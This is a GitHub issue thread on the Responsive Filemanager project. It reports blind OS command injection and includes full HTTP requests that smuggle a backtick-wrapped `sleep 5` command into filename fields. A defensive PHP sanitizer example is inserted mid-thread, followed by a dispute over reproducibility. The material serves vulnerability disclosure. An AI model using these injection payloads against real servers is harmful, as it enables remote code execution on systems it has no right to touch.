trippo / ResponsiveFilemanager

Completely Responsive Filemanager with integration for tinyMCE, CKEditor and CLEditor editors
http://responsivefilemanager.com

Multiple blind OS command injections in latest version of Responsive Filemanager #640

Open neumrli opened 4 years ago

neumrli commented 4 years ago

While doing a penetration test for a client, I discovered multiple blind OS command injections in the latest version of Responsive Filemanager, which resulted in full RCE.

My guess is that the str_replace in the file utils.php on line 738 is the reason, since it does not filter the backtick (`) operator, which is equivalent to shell_exec() in PHP; this is the cause for rename_file and rename_folder, since they both use the fix_filename function with $name as the parameter.

Rename file

In execute.php, when the value of the URL parameter action is set to rename_file, the POST parameter name is exploitable by inserting backticks (``) with a payload inside them.

Example of a vulnerable request from Burp which will send sleep 5:

POST /responsive_filemanager/filemanager/execute.php?action=rename_file HTTP/1.1
Host: test.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 34
Connection: close
Cookie: PHPSESSID=session_id

path=file.png&name=example`sleep 5`

Rename folder

In execute.php, when the value of the URL parameter action is set to rename_folder, the POST parameter name is exploitable by inserting backticks (``) with a payload inside them.

Example of a vulnerable request from Burp which will send sleep 5:

POST /responsive_filemanager/filemanager/execute.php?action=rename_folder HTTP/1.1
Host: test.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Cookie: PHPSESSID=session_id
Connection: close

path=d1&name=d1`sleep 5`

Content-disposition

In upload.php, the value of the Content-Disposition parameter filename is exploitable by creating an uploadable file with backticks around an OS command. In UploadHandler.php, the preg_replace on line 1394 runs over the uploaded filename, which contains a backtick, and this results in command execution.

POST /responsive_filemanager/filemanager/upload.php HTTP/1.1
Host: test.com
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------129232720120266098121954187103
Content-Length: 12166
Cookie: PHPSESSID=session_id
Connection: close

-----------------------------129232720120266098121954187103
Content-Disposition: form-data; name="fldr"

-----------------------------129232720120266098121954187103
Content-Disposition: form-data; name="files[]"; filename="`sleep 5`"
Content-Type: application/octet-stream

PNG
-----------------------------129232720120266098121954187103--
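The report above attributes the problem to a character blocklist (a str_replace in fix_filename) that never removes the backtick. The following is an added illustration, not Responsive Filemanager's own code: insecure_fix_filename is a hypothetical blocklist sanitizer written to mirror the approach the report describes, safe_fix_filename is an allowlist alternative, and the payload strings are constructed from the requests quoted above. It shows why a blocklist leaves backtick and $( ) sequences intact while an allowlist neutralises them, and why escapeshellarg() is still required whenever a filename reaches a shell at all.

```php
<?php
// Added example (not the project's code). insecure_fix_filename is a hypothetical
// stand-in for a str_replace-based blocklist like the one the issue describes.
declare(strict_types=1);

function insecure_fix_filename(string $name): string
{
    // Blocklist: strips a few path/shell characters but forgets the backtick and "$(".
    $blocked = ['/', '\\', ';', '|', '&', '<', '>', "\0"];
    return str_replace($blocked, '', $name);
}

function safe_fix_filename(string $name): string
{
    // Allowlist: keep only characters that are never shell or path metacharacters.
    $name = basename($name);                              // drop any directory component
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', $name); // replace everything else
    $name = ltrim($name, '.');                             // no hidden files, no ".." remnants
    return $name === '' ? 'file' : substr($name, 0, 255);  // never empty, bounded length
}

function name_is_safe(string $name): bool
{
    // Post-condition check a defender can assert on before the name is used anywhere.
    return (bool) preg_match('/^[A-Za-z0-9_][A-Za-z0-9._-]*$/', $name);
}

// Constructed inputs, modelled on the rename and upload requests in the report.
$payloads = ['example`sleep 5`', 'd1`sleep 5`', '../../etc/passwd', 'img$(id).png'];

foreach ($payloads as $p) {
    $weak = insecure_fix_filename($p);
    $safe = safe_fix_filename($p);
    printf("%-20s blocklist => %-20s [%s]  allowlist => %-20s [%s]\n",
        $p,
        $weak, name_is_safe($weak) ? 'ok' : 'UNSAFE',
        $safe, name_is_safe($safe) ? 'ok' : 'UNSAFE');
}

// Even an allowlisted name must be quoted if it is ever passed to a shell
// (for example to an external image tool); sanitisation is not shell escaping.
$cmd = 'convert ' . escapeshellarg(safe_fix_filename('example`sleep 5`')) . ' -resize 50% out.png';
echo $cmd, PHP_EOL;
```

Run it with `php sanitizer_demo.php` (the filename is yours to choose). The blocklist column reports UNSAFE for the backtick and `$(id)` payloads because those characters pass through untouched; the allowlist column reports ok for every input, since only `[A-Za-z0-9._-]` can survive. The last line shows the quoted form that should appear in any command line, regardless of which sanitiser ran first.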
hackoclipse commented 3 years ago

This is a false positive. Yes, preg_replace can lead to command injection in PHP 5.6 and lower, however then the regex has to end with "/e", which isn't the case here. The code would never execute.

neumrli commented 3 years ago

Well, I'm telling you that I have achieved command injection in these three examples above.

On the other hand, I could be wrong about preg_replace as the cause of this injection; it could be something else.

hackoclipse commented 3 years ago

I wasn't able to reproduce it in PHP 5.6 and PHP 7.2.

hackoclipse commented 3 years ago

There are also no eval or assert functions in the code, so PHP code can't execute in that way.

neumrli commented 3 years ago

It was PHP 7.4.10 in my case.

hackoclipse commented 3 years ago

Now, from my testing, I can't reproduce a single one of the vulns. I tried your original payload, created a similar environment by requesting the same options, and still no luck. I even copied the code with the potential vulnerability, gave it the correct input, and still it did nothing. And I'm pretty certain I'm doing it correctly, because I have been pentesting this application for a while now (take a look at the issues; there was also an RCE somewhere else, still not fixed, but I did request 3 CVEs).

gister9000 commented 3 years ago

I was right next to @neumrli when he exploited this for a shell. How did the shell appear if this is false positive?